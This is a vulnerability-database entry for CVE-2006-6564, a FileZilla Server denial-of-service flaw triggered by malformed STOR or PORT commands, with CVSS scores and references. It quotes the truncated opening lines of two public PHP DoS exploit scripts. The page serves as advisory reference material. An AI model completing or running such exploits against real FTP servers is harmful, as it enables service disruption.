Published: 15/12/2006 Updated: 29/07/2017

CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8

VMScore: 410

Vector: AV:N/AC:L/Au:S/C:N/I:N/A:P

FileZilla Server prior to 0.9.22 allows remote malicious users to cause a denial of service (crash) via a malformed argument to the STOR command, which results in a NULL pointer dereference. NOTE: CVE analysis suggests that the problem might be due to a malformed PORT command.

Vulnerable Product	Search on Vulmon	Subscribe to Product
filezilla filezilla

<?php # Filezilla FTP Server 0920 beta / 0921 "STOR" Denial Of Service # by rgod # mail: retrog at alice dot it # site: retrogodaltervistaorg # tested on WinXP sp2 error_reporting(E_ALL); $service_port = getservbyname('ftp', 'tcp'); $address = gethostbyname('19216813'); $user="test"; $pass="test"; $junk="///sun-tzu/ ...

<?php # Filezilla FTP Server 0920 beta / 0921 "LIST", "NLST" and "NLST -al" Denial Of Service # by shinnai # mail: shinnai[at]autistici[dot[org] # site: shinnaialtervistaorg # # special thanks to rgod for his first advisory about "STOR" Denial of service, see: retrogodaltervistaorg/filezilla_0921_doshtml # and for code in ...

NVD-CWE-noinfo http://retrogod.altervista.org/filezilla_0921_dos.html http://sourceforge.net/project/shownotes.php?release_id=470364&group_id=21558 http://www.vupen.com/english/advisories/2006/4937 https://exchange.xforce.ibmcloud.com/vulnerabilities/30853 https://nvd.nist.gov https://www.exploit-db.com/exploits/2901/

CVE-2006-6564

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect